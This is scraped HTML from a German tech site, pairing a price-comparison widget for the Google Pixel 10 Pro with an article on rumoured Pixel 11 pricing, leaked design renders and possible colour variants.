							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=9mF14ZML3xvvsU1Wdh-mdc5Hd99OQeF7QCRno7tgpQ2EbEokfk-c7DoPHGkcTOvl4p5eUIvJnUoNvPmu_f-_aq8-Wddkw8eC6f6GK1pGX9tj6A-ynv4JBEq13XGgNNj-5WtidlRBfwe&amp;mid=685576676215&amp;id=685576676215&amp;ts=20260708&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=9mF14ZML3xvvsU1Wdh-mdc5Hd99OQeF7QCRno7tgpQ2EbEokfk-c7DoPHGkcTOvl4p5eUIvJnUoNvPmu_f-_aq8-Wddkw8eC6f6GK1pGX9tj6A-ynv4JBEq13XGgNNj-5WtidlRBfwe&amp;mid=685576676215&amp;id=685576676215&amp;ts=20260708&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="739,00 €" data-vars-product-vendor="notebooksbilliger" aria-label="Deal anschauen bei notebooksbilliger für 739,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>749,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=i1S_0nFU02-tiDOfdN0LnJe3tbSWKwr5e1JKjacGdEc6RmIsvl8L8XwpgNs8FzmZYp5eUIvJnUoNvPmu_f-_aqVk-kHwG_HYtp1bPvpt8NnzjRMc48vr-G4U2VorRIJ5LLdD2b4PFgn55AQdrkp4S4&amp;mid=685509711925&amp;id=685509711925&amp;ts=20260708&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=i1S_0nFU02-tiDOfdN0LnJe3tbSWKwr5e1JKjacGdEc6RmIsvl8L8XwpgNs8FzmZYp5eUIvJnUoNvPmu_f-_aqVk-kHwG_HYtp1bPvpt8NnzjRMc48vr-G4U2VorRIJ5LLdD2b4PFgn55AQdrkp4S4&amp;mid=685509711925&amp;id=685509711925&amp;ts=20260708&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="749,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 749,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/24204.png" alt="coolblue" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>759,95 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=8QPJI2NQy8XtiDOfdN0LnJe3tbSWKwr5QeYu02RyInb6RmIsvl8L8VovW2rD7AzJop5eUIvJnUoNvPmu_f-_aq8-Wddkw8eC6f6GK1pGX9tj6A-ynv4JBEq13XGgNNj-5WtidlRBfwe&amp;mid=685628452345&amp;id=685628452345&amp;ts=20260708&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=8QPJI2NQy8XtiDOfdN0LnJe3tbSWKwr5QeYu02RyInb6RmIsvl8L8VovW2rD7AzJop5eUIvJnUoNvPmu_f-_aq8-Wddkw8eC6f6GK1pGX9tj6A-ynv4JBEq13XGgNNj-5WtidlRBfwe&amp;mid=685628452345&amp;id=685628452345&amp;ts=20260708&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="759,95 €" data-vars-product-vendor="coolblue" aria-label="Deal anschauen bei coolblue für 759,95 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://s24.media/shop/11af34f513114e17ab24f15ca5083429" alt="Baur Versand" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.085,91 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://lg.s24.cloud/catalog/9116/189565/8832469004" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://lg.s24.cloud/catalog/9116/189565/8832469004" data-vendor-api="shopping24" data-vars-product-price="1.085,91 €" data-vars-product-vendor="Baur Versand" aria-label="Deal anschauen bei Baur Versand für 1.085,91 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.085,91 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=aDi6WCFLcQggFdiMIpCMzOwK0-RvIEuSuStW0SFkIqZMdozeyQB1s3_NYWZJZdx_FUCt42IORS2NdyiYhKsSh4pVXnFPgu6pTKm2AV43KDScDIN4u2A5RPycuBwsu44UCTvm99U9FVv&amp;mid=685497142624&amp;id=685497142624&amp;ts=20260708&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=aDi6WCFLcQggFdiMIpCMzOwK0-RvIEuSuStW0SFkIqZMdozeyQB1s3_NYWZJZdx_FUCt42IORS2NdyiYhKsSh4pVXnFPgu6pTKm2AV43KDScDIN4u2A5RPycuBwsu44UCTvm99U9FVv&amp;mid=685497142624&amp;id=685497142624&amp;ts=20260708&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.085,91 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.085,91 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Google</span>
													</div>
												<div class="price-comparison__price ">
						<span>1.099,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.jdoqocy.com/click-1676582-14506529?sid=rss&amp;url=https://store.google.com/product/pixel_10_pro" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.jdoqocy.com/click-1676582-14506529?sid=rss&amp;url=https://store.google.com/product/pixel_10_pro" data-vars-product-price="1.099,00 €" data-vars-product-vendor="Google" aria-label="Deal anschauen bei Google für 1.099,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/21515.png" alt="JB-Computer" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.116,08 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=LclCJaTpyFBgvrhhe5GGHeKFFgDnWCVLKnqn0bkX8TYD2eBKnwuxU1ONt2jyH31IlUCt42IORS2NdyiYhKsSh4pVXnFPgu6pTKm2AV43KDScDIN4u2A5RNlddbQJq87NQ&amp;mid=686468941685&amp;id=686468941685&amp;ts=20260708&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=LclCJaTpyFBgvrhhe5GGHeKFFgDnWCVLKnqn0bkX8TYD2eBKnwuxU1ONt2jyH31IlUCt42IORS2NdyiYhKsSh4pVXnFPgu6pTKm2AV43KDScDIN4u2A5RNlddbQJq87NQ&amp;mid=686468941685&amp;id=686468941685&amp;ts=20260708&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.116,08 €" data-vars-product-vendor="JB-Computer" aria-label="Deal anschauen bei JB-Computer für 1.116,08 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading toc">Wie viel wird das Google Pixel 11 kosten?</h2>



<p>Die Preise für das Pixel 11 sind noch nicht bestätigt, doch sollte Google seinen jüngsten Preistrends folgen, könnte der Einstiegspreis für das Basismodell bei etwa 899 Euro liegen, während die Pro-Version möglicherweise etwa 1.099 Euro kosten würde. Die Pro XL- und Pro Fold-Versionen könnten etwa 1.299 Euro beziehungsweise 1.899 Euro kosten.</p>



<p>Diese Preisgestaltung würde jedoch bedeuten, dass Google an die Preise der Pixel-10-Modelle anknüpft, bei denen es im Vergleich zur Pixel-9-Serie keine Preiserhöhung gab. Es ist unwahrscheinlich, dass dies zwei Jahre in Folge geschieht; daher rechnen wir eher mit einer Preiserhöhung für die Pixel-11-Smartphones, auch wenn diese nur geringfügig ausfällt.</p>



<p>Ein Hinweis, der möglicherweise auf Googles Strategie hindeutet, Preiserhöhungen zu vermeiden, ist die Reduzierung der RAM-Kapazität bei den neuen Smartphones. Es scheint, als werde Google das 11 Pro und das 11 Pro XL in zwei Varianten mit entweder 12 oder 16 GB RAM anbieten.</p>



<p>Das 12-GB-Modell könnte die Lösung sein, mit der Google einen höheren Einstiegspreis für seine Flaggschiff-Smartphones vermeiden könnte – auch wenn dies bedeutet, dass Sie für denselben Preis nicht so viel Leistung erhalten wie bei den aktuellen Modellen <a href="https://www.pcwelt.de/article/2894857/google-pixel-10-pro-test-2.html" target="_blank" rel="noreferrer noopener">Pixel 10 Pro</a> und <a href="https://www.pcwelt.de/article/2896055/google-pixel-10-pro-xl-test-bestes-android-handy-2025.html" target="_blank" rel="noreferrer noopener">10 Pro XL</a>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b4b25"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro-Fold-review-34.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro Fold review 34" class="wp-image-2454254" width="1200" height="672" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<h2 class="wp-block-heading toc">Welche technischen Daten und Funktionen wird das Google Pixel 11 bieten?</h2>



<div class="wp-block-idg-base-theme-listicle-chart-block wp-block-product-chart product-chart">
<div class="wp-block-listicle-chart"><div class="listicle-chart-separator"></div><div class="wp-block-listicle-chart-item listicle-chart-item">
<h3 class="wp-block-heading">Pixel 11: Design &amp; Verarbeitung</h3>



<p>Angesichts der Tatsache, dass Google bisher sehr zurückhaltend war, das Design seiner Smartphones grundlegend zu überarbeiten – abgesehen davon, dass die Kameraleiste ab dem <a href="https://www.pcwelt.de/article/2434705/google-pixel-9-test.html" target="_blank" rel="noreferrer noopener">Pixel 9</a> zu einem Visier umgestaltet wurde –, erwarten wir hier keine gravierenden Änderungen. Die jüngsten Gerüchte haben dies weitgehend bestätigt, doch es gibt einige kleinere Designanpassungen, die die neuen Pixel-Smartphones nicht nur schlanker wirken lassen, sondern auch ihre allgemeine Benutzerfreundlichkeit verbessern sollen.</p>



<p>Da Google zuvor erklärt hat, dass wir alle zwei bis drei Jahre mit einem Redesign rechnen können, scheint es, als werde die Pixel-12-Serie im Jahr 2027 größere Veränderungen mit sich bringen.</p>



<p>Was das Design des Pixel 11 betrifft<a href="https://www.techadvisor.com/article/3102252/google-pixel-11-design-leak-highlights-two-changes.html">,</a> so scheint es – <a href="https://www.androidheadlines.com/google-pixel-11-pro-fold" target="_blank" rel="noreferrer noopener">wie aus CAD-basierten Renderings hervorgeht</a> – dem Pixel 10 äußerst ähnlich zu sein, mit lediglich zwei Designanpassungen. Dabei handelt es sich um einen schmaleren Rahmen um den Bildschirm sowie eine vollständig aus Glas bestehende Kameraleiste anstelle eines Metallabschnitts um den Blitz herum.</p>



<p>Die Abmessungen sind angeblich identisch, abgesehen davon, dass das Smartphone 0,1 Millimeter dünner ist. Bitte beachten Sie, dass die Farbe nur zur Veranschaulichung dient, da sie lediglich auf der Farbe „Lavender“ des <a href="https://www.pcwelt.de/article/3104634/google-pixel-10a-test.html" target="_blank" rel="noreferrer noopener">Pixel 10a</a> basiert.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b532b"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Google-Pixel-11-design-leaked-front-and-back.webp?w=1200" alt="Google Pixel 11 design leaked front and back" class="wp-image-3102256" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Onleaks / Android Headlines</p></div>



<p>Als Nächstes folgt das Pixel 11 Pro, bei dem sich ein ähnliches Bild wie beim Standardmodell abzeichnet. Die Renderings scheinen ein nahezu identisches Design mit dem gleichen glänzenden Rahmen wie zuvor zu bestätigen, ergänzt durch die neue, komplett schwarze Kameraleiste.</p>



<p>Besonders auffällig ist, dass der Temperatursensor auf der Rückseite zu fehlen scheint. Dieser befindet sich normalerweise unterhalb des Blitzes innerhalb der Kameraleiste und könnte auf den Wegfall dieser einzigartigen, wenn auch eher nischenorientierten Funktion hindeuten.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b5846"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Google-Pixel-11-Pro-leak-front-and-back.webp" alt="Google Pixel 11 Pro leak front and back" class="wp-image-3103374" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Onleaks / Android Headlines</p></div>



<p>Und hier ist das Renderbild des Pixel 11 Pro XL, das dasselbe zeigt:</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b5d1f"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/Google-Pixel-11-Pro-XL-leaked-design.webp" alt="Google Pixel 11 Pro XL design" class="wp-image-3105903" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Onleaks / Android Headlines</p></div>



<p>Für das Pixel 11 Pro Fold sind online einige Renderings aufgetaucht, die eine sehr ähnliche Bauweise wie beim <a href="https://www.pcwelt.de/article/2945312/google-pixel-10-pro-test-3.html" target="_blank" rel="noreferrer noopener">10 Pro Fold</a> zeigen – so sehr, dass man die beiden Modelle auf den ersten Blick verwechseln könnte. Bei genauerem Hinsehen fällt jedoch auf, dass der Blitz und das Mikrofon in die Kameraausbuchtung integriert wurden, um ein einheitliches Erscheinungsbild zu schaffen.</p>



<p>Zwar ist es unwahrscheinlich, dass diese Maßnahme allein zu einer Verbesserung der Kameraqualität des 11 Pro Fold führt, doch aus gestalterischer Sicht wirkt das Design dadurch deutlich aufgeräumter.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b623e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Pixel-11-pro-fold-render.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="" class="wp-image-3083650" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">OnLeaks x Android Headlines</p></div>



<p>Interessanter sind die Renderings, die das 11 Pro Fold im Seitenprofil zeigen; sie deuten offenbar darauf hin, dass das Smartphone im aufgeklappten Zustand nur 4,8 Millimeter dünn und im zusammengeklappten Zustand 10,1 Millimeter dick sein wird.</p>



<p>Zugegebenermaßen liegt das Gerät damit noch einen Schritt hinter der Konkurrenz zurück (das <a href="https://www.pcwelt.de/article/2843601/samsung-galaxy-z-fold-7-test.html" target="_blank" rel="noreferrer noopener">Galaxy Z Fold 7</a> und das <a href="https://www.pcwelt.de/article/2838914/honor-magic-v5-test.html" target="_blank" rel="noreferrer noopener">Honor Magic V5</a> sind im aufgeklappten Zustand nur 4,2 Millimeter beziehungsweise 4,1 Millimeter dünn), doch es stellt eine deutliche Verbesserung gegenüber dem 10 Pro Fold dar, das sich in der Hand etwas klobig anfühlte.</p>



<p>Wenden wir uns nun dem Pixel 11 Pro XL zu: Die ersten Vorstellungen davon, wie dieses Smartphone aussehen könnte, stammen nicht aus einer Reihe von Renderings, sondern vom Hüllenhersteller <a href="https://thinborne.com/products/pixel-11-pro-xl-case" target="_blank" rel="noreferrer noopener">Thinborne</a>, der (versehentlich?) die dazugehörige Handyhülle etwas früher als geplant vorgestellt hat.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b6785"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Pixel-11-Pro-case.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="" class="wp-image-3083654" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">ThinBorne</p></div>



<p>Zwar lassen sich aus einer Hülle nur begrenzt Rückschlüsse ziehen, doch die Aussparung für die Kamera deutet darauf hin, dass es einen etwas größeren, aber massiveren Kameraausleger geben könnte. </p>



<p>Sollte dies zutreffen, dürfte dies verhindern, dass die Kameras in Ihrer Hosentasche hervorstehen – ein Problem, das im Jahr 2026 immer größer zu werden scheint (die Kamerawölbung <a href="https://www.pcwelt.de/article/3041397/honor-magic-8-pro-test.html" target="_blank" rel="noreferrer noopener">des Honor Magic 8 Pro</a> ist in einer Jeans schon aus einem Kilometer Entfernung zu erkennen). Ob dies auch eine Änderung der verbauten Sensoren beim Pixel 11 Pro XL bedeutet, bleibt abzuwarten.</p>



<p>Was die Farbvarianten angeht, hat die Android 17 QPR1 Beta möglicherweise ein Licht auf die Sache geworfen, da sie zwei Hintergrundbilder enthält, die angeblich mit dem Pixel 11 Pro Fold in Verbindung stehen und die <a href="https://9to5google.com/2026/04/23/pixel-11-pro-fold-wallpaper-leak/">Namen „Lunar Tides“ sowie „Tidal Swirl“ tragen</a>.</p>



<p>In der Vergangenheit waren die von Google mitgelieferten Hintergrundbilder in der Regel so gestaltet, dass sie zur Außenfarbe der jeweils neuesten Smartphones passten. Während „Lunar Tides“ einen monochromen Stil aufweist, der dem „Moonstone“-Farbdesign des 10 Pro Fold nicht allzu unähnlich ist, ist es „Tidal Swirl“, das einen dunkleren Grünton aufweist, als wir ihn von der aktuellen Generation der Pixel-Smartphones kennen.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b6cde"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/Google-Pixel-11-Fold-wallpaper.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="" class="wp-image-3126177" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">9to5Google</p></div>



<p>Bei genauerer Betrachtung der Beta-Version lässt sich feststellen, dass diese Hintergrundbilder mit Codenamen verknüpft sind, wobei „Midnight“ und „Pine“ jeweils mit „Lunar Tides“ und „Tidal Swirl“ gepaart sind. Obwohl sich zum jetzigen Zeitpunkt noch nicht genau sagen lässt, wie viele der Pixel-11-Geräte die potenziell ansprechende „Pine“-Variante erhalten könnten, sind diese Neuigkeiten ein gutes Zeichen für alle, die eine grüne Farbvariante auf ihrem Gerät bevorzugen.</p>



